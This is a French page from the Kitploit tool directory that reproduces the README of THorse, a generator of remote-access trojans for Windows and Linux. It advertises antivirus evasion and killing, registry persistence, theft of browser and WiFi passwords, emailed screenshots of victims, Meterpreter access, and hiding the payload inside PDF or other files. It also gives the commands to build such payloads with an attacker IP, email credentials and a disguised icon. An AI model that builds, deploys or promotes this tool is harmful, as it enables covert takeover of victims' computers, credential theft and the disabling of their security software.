Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
thorse — THorse est un générateur de RAT (Remote Administrator Trojan) pour les systèmes Windows/Linux écrit en Python 3. | Kitploit
Outils/GitHubGitHub/pushpenderindia/thorse
Cassage de Mots de PasseFrameworks d'ExploitationGénération de PayloadsMécanismes de PersistanceÉvasion IDS/IPSPost-ExploitationCommandement et ContrôleCheval de Troie d'Accès à DistanceAnti-Bot
GitHubpushpenderindia/thorse

thorse

THorse est un générateur de RAT (Remote Administrator Trojan) pour les systèmes Windows/Linux écrit en Python 3.

61412663il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

THorse

THorse est un générateur de RAT (Remote Administrator Trojan) pour systèmes Windows/Linux écrit en Python 3.

                    Ce petit script Python peut faire un travail vraiment impressionnant.

Avertissement

:computer: Ce projet a été créé uniquement pour de bonnes fins et une utilisation personnelle.

CE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE. VOUS POUVEZ UTILISER CE LOGICIEL À VOS PROPRES RISQUES. L'UTILISATION RELÈVE DE L'ENTIÈRE RESPONSABILITÉ DE L'UTILISATEUR FINAL. LES DÉVELOPPEURS DÉCLINENT TOUTE RESPONSABILITÉ ET NE SONT PAS RESPONSABLES DE TOUT USAGE ABUSIF OU DOMMAGE CAUSÉ PAR CE PROGRAMME.

Fonctionnalités

  • Fonctionne sous Windows/Linux
  • Notifie une nouvelle victime par e-mail
  • Indétectable
  • Ne nécessite pas de privilèges root ou administrateur
  • Persistance
  • Envoie une capture d'écran de l'écran du PC victime par e-mail
  • Donne un accès complet Meterpreter à l'attaquant
  • Ne nécessite jamais d'installation de Metasploit pour créer le cheval de Troie
  • Crée un binaire exécutable sans aucune dépendance
  • Crée une charge utile de taille réduite (~5 Mo) avec des fonctionnalités avancées
  • Obfusque la charge utile avant de la compiler, contournant ainsi quelques antivirus supplémentaires
  • La charge utile générée est encodée en Base64, ce qui rend l'ingénierie inverse extrêmement difficile
  • Tue l'antivirus sur le PC victime et tente de désactiver le Centre de sécurité Windows
  • Interface colorée géniale pour générer la charge utile
  • Côté attaquant : lors de la création de la charge utile, le script détecte automatiquement les dépendances manquantes et les installe
  • Permet d'ajouter une icône personnalisée au fichier malveillant
  • Binder intégré qui peut lier un exécutable à n'importe quel fichier [.pdf, .txt, .exe, etc.], exécutant le fichier légitime au premier plan et les codes malveillants en arrière-plan en tant que service.
  • Vérifie si une instance est déjà en cours d'exécution sur le système ; si une instance en cours est trouvée, seul le fichier légitime est exécuté [Interdiction des instances multiples].
  • L'attaquant peut créer/compiler pour Windows/Linux à partir d'un système Linux, mais ne peut créer/compiler qu'un exécutable Windows à partir d'une machine Windows
  • Récupère les mots de passe enregistrés du système victime et les envoie à l'attaquant.
Récupérations prises en charge, essaie de récupérer les mots de passe enregistrés depuis :
Navigateur Chrome
WiFi

Note : Le voleur (stealer) personnalisé est codé, il ne dépend pas de LaZagne

Testé sur

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Voici les limites de la charge utile meterpreter générée avec Metasploit :-

  • Il faut lancer le listener Metasploit avant d'exécuter la backdoor
  • La backdoor ne devient pas persistante d'elle-même ; nous devons utiliser les modules de post-exploitation pour rendre la backdoor persistante. Et les modules de post-exploitation ne peuvent être utilisés qu'après une exploitation réussie.
  • Ne nous notifie pas lorsque la charge utile est exécutée sur un nouveau système.

Nous savons tous à quel point la charge utile Meterpreter est puissante, mais la charge utile qui en est issue n'est pas satisfaisante.

Voici les fonctionnalités de ce générateur de charge utile qui vous donneront une bonne idée de ce script Python :-

  • Utilise le registre Windows pour assurer la persistance sous Windows.
  • Parvient également à assurer la persistance sous Linux.
  • La charge utile peut s'exécuter sous Linux ainsi que sous Windows.
  • Fournit un accès complet, le listener Metasploit peut être utilisé et un listener personnalisé est également pris en charge (vous pouvez créer votre propre listener)
  • Envoie une notification par e-mail, chaque fois que la charge utile s'exécute sur un nouveau système, avec les informations complètes du système.
  • Génère la charge utile en moins d'une minute, voire moins.
  • Prend en charge tous les modules de post-exploitation meterpreter.
  • La charge utile peut être créée aussi bien sous Windows que sous Linux.

Prérequis

  • Python 3.X
  • Quelques modules externes

Veuillez noter :

Sous Windows, veuillez spécifier/définir le chemin de Pyinstaller dans paygen.py [ligne 14]

Le chemin par défaut est le suivant : PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

Modifiez-le selon votre système

Comment l'utiliser sous Linux

# Install dependencies 
$ Install latest python 3.x

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ bash installer_linux.sh

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Comment l'utiliser sur un VPS (recommandé)

# 1. Setup a VPS, You can buy Ubuntu VPS from any VPS Provider such as Digital Ocean, Linode, AWS, etc

# 2. Connect to your VPS Using SSH
$ ssh username@ip_address

# 3. Update Your Linux VPS
$ sudo apt update

# 4. Add Kali Linux Repository
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. Install gnupg package
$ sudo apt install gnupg

# 6. Add Kali Public Keys
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. Update VPS
$ sudo apt update
Télécharger l’outil